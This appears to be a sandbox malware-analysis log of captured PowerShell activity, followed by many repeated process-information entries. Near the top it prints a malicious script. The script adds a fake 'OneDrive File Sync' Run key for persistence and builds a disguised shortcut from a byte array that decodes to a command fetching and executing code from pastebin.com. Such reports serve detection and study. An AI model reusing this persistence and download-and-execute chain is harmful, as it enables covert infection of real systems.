Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULL
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
